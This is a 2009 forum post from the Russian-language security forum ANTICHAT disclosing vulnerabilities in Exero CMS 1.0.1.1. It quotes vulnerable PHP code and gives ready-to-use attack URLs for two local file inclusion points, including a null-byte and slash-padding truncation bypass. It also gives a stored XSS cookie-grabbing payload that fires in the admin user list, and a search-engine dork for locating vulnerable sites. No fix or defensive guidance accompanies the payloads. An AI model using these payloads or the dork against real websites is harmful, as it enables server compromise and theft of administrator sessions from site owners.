HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Веб-уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Exero CMS 1.0.1.1 Multiple Vulnerabilities
  #1  
Старый 13.04.2009, 22:38
Spyder
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076

Репутация: 4303


По умолчанию Exero CMS 1.0.1.1 Multiple Vulnerabilities

Exero CMS 1.0.1.1 Multiple Vulnerabilities

1) Local File Inclusion

Need: magic_quotes_gpc=off
Файл: index.php
PHP код:
if(empty($_REQUEST['module'])) {
    include(
"modules/".$ecms->settings['defaultmod']);
} else if(
file_exists("modules/".$_REQUEST['module']."/index.php")) {
    include(
"modules/".$_REQUEST['module']."/index.php");
} else {
    include(
"themes/$theme/errors/404.php");

Собственно инклуд тут в двух местах

www.site.com/index.php?module={INC}%00
и
www.site.com/index.php?module=not_exist_module&theme={INC}%00

Для второго случая наличие magic_quotes_gpc=off не обязательно, обходим известным способом со слешами
www.site.com/index.php?module=not_exist_module&theme={INC} {/ x 4096}


2) XSS

XSS в коментарии к новосятм
Файл: /modules/news/index.php

XSS при регистрации. Указываем в логине <script>alert(document.cookie)</script>
Файлы подверженые уязвимости:

/modules/community/members.php
PHP код:
$getuserinfo $db->query("SELECT * FROM users");
while(
$userinfo $db->fetch_array($getuserinfo)) {
    
$users[$users['rowcount']] = $userinfo;
    
$users['rowcount']++;

/admin/users.php
PHP код:
$getusers $db->query("SELECT * FROM ".TABLE_PREFIX."users ORDER BY uid ASC");
    while(
$userinfo $db->fetch_array($getusers)) {
        
print_multicol_row(array($userinfo['username']."[align:left]"=>"","<a href=\"users.php?do=edit&user=".$userinfo['uid']."\">Edit</a>, <a href=\"users.php?do=delete&user=".$userinfo['uid']."\">Delete</a>[align:right]"=>"140"));
    } 
т.е xss будет прямо в админке

dork: "Powered by Exero CMS"
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
VUEngine 2.2 Multiple Vulnerabilities Spyder Веб-уязвимости 0 13.04.2009 22:36
Symantec Scan Engine Multiple Vulnerabilities NeMiNeM Forum for discussion of ANTICHAT 1 25.04.2006 18:08
osTicket <= 1.3.1 Multiple vulnerabilities Rebz Мировые новости. Обсуждения. 0 03.07.2005 13:13



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ